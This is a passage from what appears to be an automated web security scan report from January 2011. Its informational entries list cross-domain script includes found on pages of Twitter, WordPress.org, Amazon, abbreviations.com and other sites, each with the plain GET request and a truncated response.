<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883" type="text/javascript"></script>
...[SNIP]...

21.481. http://twitter.com/typekit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/typekit

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964132-61803-46798
ETag: "2d1d82c342cf698a8f46318662e78b68"
Last-Modified: Tue, 25 Jan 2011 14:02:12 GMT
X-Runtime: 0.01489
Content-Type: text/html; charset=utf-8
Content-Length: 43545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.482. http://twitter.com/ups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ups

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475
http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475
http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475
http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475
http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475
http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475
http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964085-20547-5536
ETag: "85433ba8bcb16420f3ea185c5d7c6195"
Last-Modified: Tue, 25 Jan 2011 14:01:25 GMT
X-Runtime: 0.01379
Content-Type: text/html; charset=utf-8
Content-Length: 52371
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475" type="text/javascript"></script>
...[SNIP]...

21.483. http://ugg.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ugg.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.484. http://whdhstore.hipcricket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whdhstore.hipcricket.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://uac.advertising.com/wrapper/aceUAC.js

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private

<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...
</SCRIPT>
<SCRIPT TYPE='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></SCRIPT>
...[SNIP]...
</SCRIPT>
<SCRIPT TYPE='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></SCRIPT>
...[SNIP]...

21.485. http://wordpress.org/extend/plugins/tweetmeme-follow-button/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme-follow-button/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 20241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.486. http://wordpress.org/extend/plugins/tweetmeme/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.487. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:11:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.488. http://world-cup-news.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.fmpub.net/site/tweetmeme
http://thirdparty.fmpub.net/placement/329074?fleur_de_sel=2752788126]
http://tweetmeme.com/auth/remote?r=http%3A%2F%2Fworld-cup-news.net

Request

GET / HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:19 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=c4ce7beb6b80cbdc2e05ed76224f380c; expires=Tue, 01-Feb-2011 14:03:19 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054788589477539
X-Served-In: 0.055518865585327
X-Served-By: h04
Content-Length: 42861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <title
...[SNIP]...
</script>

   <script src="http://tweetmeme.com/auth/remote?r=http%3A%2F%2Fworld-cup-news.net"></script>
...[SNIP]...
<div class="left" style="display: inline; margin: 3px 10px 0px 0px; width: 48px; height: 48px;"><script type="text/javascript" src="http://thirdparty.fmpub.net/placement/329074?fleur_de_sel=2752788126]"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.489. http://www.abbreviations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://media.fastclick.net/w/get.media?sid=9374&m=7&tp=9&d=j&t=s
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:14 GMT
Connection: close
Content-Length: 35655

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
<br>
<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=9374&m=7&tp=9&d=j&t=s"></script>
...[SNIP]...

21.490. http://www.abbreviations.com/bs2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://uac.advertising.com/wrapper/aceUAC.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727

<title>What does  stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

21.491. http://www.abbreviations.com/justadded.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/justadded.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://uac.advertising.com/wrapper/aceUAC.js
http://www.google-analytics.com/urchin.js

Request

GET /justadded.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:12:36 GMT
Connection: close
Content-Length: 49445

<title>Just Added</title>
<meta name="description" content="Latest additions to the Abbreviations.com directory">
<base href="http://www.abbreviations.com/justadded.aspx">
<style><!--

p.specia
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

21.492. http://www.abbreviations.com/random.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/random.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://uac.advertising.com/wrapper/aceUAC.js
http://www.google-analytics.com/urchin.js
http://www.google.com/jsapi

Request

GET /random.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

21.493. http://www.abbreviations.com/searchAmazon.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://uac.advertising.com/wrapper/aceUAC.js
http://www.google-analytics.com/urchin.js

Request

GET /searchAmazon.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

21.494. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

http://cache.addthiscdn.com/www/q0197/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.495. http://www.adside.com/adside/advertiser.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/advertiser.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:23 GMT
ETag: W/"14556-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14556
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AdSide: Beyond St
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.496. http://www.adside.com/adside/publisher.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/publisher.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:22 GMT
ETag: W/"8990-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8990
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AdSide: Beyond St
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.497. http://www.aerotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:22:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:22:56 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=dda16b828fd3667079886639fd1d974f3651df908a5a2b674d3e0c18759e864aee104e3b; Path=/
Content-Length: 58457

<!DOCTYPE html>
<html>
<head>
   <title>Aircraft for Sale, find used or new Cessna, Beechcraft at Aero Trader</title>
   <meta http-equiv="Cache-Control" content="no-cache" />
   <m
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.498. http://www.aerotrader.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:38 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 24040


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Airplane Resources: Airplane Loans, Airplane Insurance, Real Estate, and More - AeroTra
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.499. http://www.aerotrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js
http://server.iad.liveperson.net/hc/13223596/x.js?cmd=file&file=chatScript3&site=13223596&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /sell/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:15 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 31681


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell Your New or Used Aircraft, Real Estate or Trade - AeroTrader.com</title>
<meta na
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script language='javascript' src='http://server.iad.liveperson.net/hc/13223596/x.js?cmd=file&file=chatScript3&site=13223596&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.500. http://www.alistapart.com/articles/alternate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alistapart.com
Path:	/articles/alternate/

Issue detail

The response dynamically includes the following script from another domain:

http://www.37signals.com/svn/job.fcgi

Request

GET /articles/alternate/ HTTP/1.1
Host: www.alistapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.501. http://www.amazon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.502. http://www.amazon.com/b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/b/

Issue detail

The response dynamically includes the following script from another domain:

http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

Response

21.503. http://www.amazon.com/gp/site-directory/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/site-directory/x22

Issue detail

The response dynamically includes the following script from another domain:

